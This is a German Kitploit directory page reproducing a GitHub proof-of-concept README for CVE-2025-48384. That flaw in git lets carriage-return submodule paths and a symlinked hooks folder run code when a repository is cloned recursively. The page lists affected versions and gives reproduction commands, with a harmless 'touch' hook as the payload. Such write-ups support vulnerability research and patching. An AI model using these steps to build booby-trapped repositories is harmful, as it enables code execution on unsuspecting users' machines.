Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-48384-poc — PoC für CVE-2025-48384 | Kitploit
Tools/GitHubGitHub/jacobholtz/cve-2025-48384-poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPapers & ForschungLernen & BildungPayload-Entwicklung
GitHubjacobholtz/cve-2025-48384-poc

CVE-2025-48384-poc

PoC für CVE-2025-48384

Repository anzeigen
1vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-48384-poc

CVE-2025-48384 hat die Form einer unsachgemäßen Linkauflösung (Link-Following) Schwachstelle in git. Insbesondere werden Dateinamen mit Wagenrückläufen in .git/config falsch geparst, und das Einfügen eines Symlinks, der auf eine git-Hook-ausführbare Datei in einem Submodul zeigt, als Submodul-Hooks-Verzeichnis kann zu beliebiger Codeausführung führen, wenn das Repository mit git clone --recursive geklont wird.

Git für Microsoft Windows ist von dieser Schwachstelle nicht betroffen, sodass hauptsächlich bestimmte git-Versionen auf Linux und MacOS verwundbar sind. Betroffene Versionen sind:

  • v2.50.0
  • v2.49.0
  • v2.48.0-v2.48.1
  • v2.47.0–v2.47.2
  • v2.46.0–v2.46.3
  • v2.45.0-v2.45.3
  • v2.44.0–v2.44.3
  • v2.43.6 und älter

Schritte zur Reproduktion des poc:

  1. Erstelle zwei Repositories: poc und submodule
  2. Erstelle im Submodul einen post-checkout Git-Hook, der Code ausführt, wenn das poc-Repository rekursiv geklont wird:
root@kitploit:~
#!/bin/bash
touch ~/hackedlol
  1. Füge im poc-Repository das Submodul-Repo mit git submodule add https://github.com/<your submodule repo>.git sub hinzu
Tool herunterladen
  • Füge einen Wagenrücklauf zum neu erstellten Unterordner mit git mv sub $(printf "sub\r") hinzu
  • Füge printf "\tpath = \"sub\r\"\n" in .gitmodules ein und entferne den ursprünglichen Pfad.
  • Erstelle einen Symlink zum hooks-Ordner in deinem lokalen .git-Verzeichnis mit ln -s .git/modules/sub/hooks sub
  • Füge alles zum Repository hinzu
  • Hoffentlich funktioniert es lol
  • Quellen

    • https://dgl.cx/2025/07/git-clone-submodule-cve-2025-48384
    • https://github.com/git/git/commit/05e9cd64ee23bbadcea6bcffd6660ed02b8eab89#diff-8fbc2654131392c3018ecfc92462057b3bdc675cc674084c248bb0393a46b59f